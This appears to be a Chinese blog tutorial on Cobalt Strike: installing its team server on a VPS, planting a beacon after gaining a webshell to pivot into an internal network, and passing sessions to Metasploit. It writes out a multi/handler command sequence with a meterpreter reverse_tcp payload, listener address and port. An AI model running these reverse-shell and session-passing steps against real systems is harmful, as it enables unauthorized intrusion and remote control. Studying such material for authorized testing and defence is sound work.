cobaltstrike的使用
阅读原文时间:2023年07月09日阅读:1

0x01 介绍

Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等

0x02 安装

CS是分成客户端和服务端的,我们可以在我们的VPS上安装服务端。 但是先要安装 jdk

sudo apt-get install openjdk-8-jdk

将cs 下载好。自己找资源 下载,,给权限。 马赛克是公网VPS的IP。 5555是连接密码。。。kali后台不可以关哈

就在客户端上,直接连接就行了。 隐私。。

一个简单的cs上线

tips:在我们内网渗透的时候哈,拿到webshell了,可以的话直接上cs马,在cs上开socks代理,直接搞内网。舒服的一比。。。

与Metasploit进行联动

Cobalt Strike → Metasploit

Cobalt Strike获得了一个上线机器,想把这个机器传给Metasploit中的meterpreter,获得一个session进行控制。在Metasploit执行以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #不要用x64的payload
set lhost 192.168.40.129
set lport 63
run -j

之后使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。

然后选中计算机,右键->新增会话,选择Metasploit的监听器:

这个时候可以看到,Metasploit上的监听已经上线,现在可以对meterpreter获得的session进行控制。

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章